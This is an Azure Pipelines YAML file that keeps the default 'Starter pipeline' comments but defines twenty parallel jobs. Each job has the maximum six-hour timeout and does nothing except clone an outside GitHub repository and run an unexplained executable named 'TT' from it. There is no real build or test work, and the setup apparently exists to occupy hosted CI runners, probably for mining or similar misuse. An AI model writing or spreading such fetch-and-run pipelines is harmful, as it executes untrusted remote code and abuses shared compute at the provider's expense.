# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool: Azure Pipelines

jobs:
- job: a
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT
  
- job: b
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT
  
- job: c
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: d
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: e
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT
  
- job: h
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: i
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: j
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: k
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: l
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: m
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: n
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: o
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: p
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: q
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT
  
- job: r
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: s
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: t
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: u
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT

- job: v
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: git clone https://github.com/Jwjwj83838/TES.git && cd TES && chmod +x TT && ./TT
